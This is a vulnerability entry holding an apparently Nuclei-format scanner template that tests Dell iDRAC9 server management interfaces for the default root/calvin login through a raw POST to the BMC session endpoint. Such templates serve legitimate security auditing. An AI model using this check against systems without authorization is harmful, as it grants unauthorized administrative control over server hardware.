dell-idrac9-default-login: DELL iDRAC9 - Default Login

Date: 2025-08-01 | Affected software: dell idrac9 | PoC: public

Vulnerability description

DELL iDRAC9 default login credentials were discovered.

PoC code [public]

id: dell-idrac9-default-login

info:
  name: DELL iDRAC9 - Default Login
  author: kophjager007,milo2012
  severity: high
  description: |
    DELL iDRAC9 default login credentials was discovered.
  reference:
    - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
  classification:
    cwe-id: cwe-798
  metadata:
    max-request: 1
  tags: dell,idrac,default-login,vuln

http:
  - raw:
      - |
        POST /sysmgmt/2015/bmc/session HTTP/1.1
        Host: {{Hostname}}
        User: "{{username}}"
        Password: "{{password}}"

    payloads:
      username:
        - root
      password:
        - calvin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: regex
        name: authresult
        regex:
          - '"authResult"\s*:\s*0'

      - type: status
        status:
          - 201
          - 200
# digest: 490a0046304402205c471e3c04992a1712056e0a74d45f8fc75b4b27b01ae2d399b884bce966778f022008749d741ec6b660f9744f6e94d907e6f71f6286eec6cde6ac32be6ef0c0ad11:922c64590222798bb761d5b6d8e72950
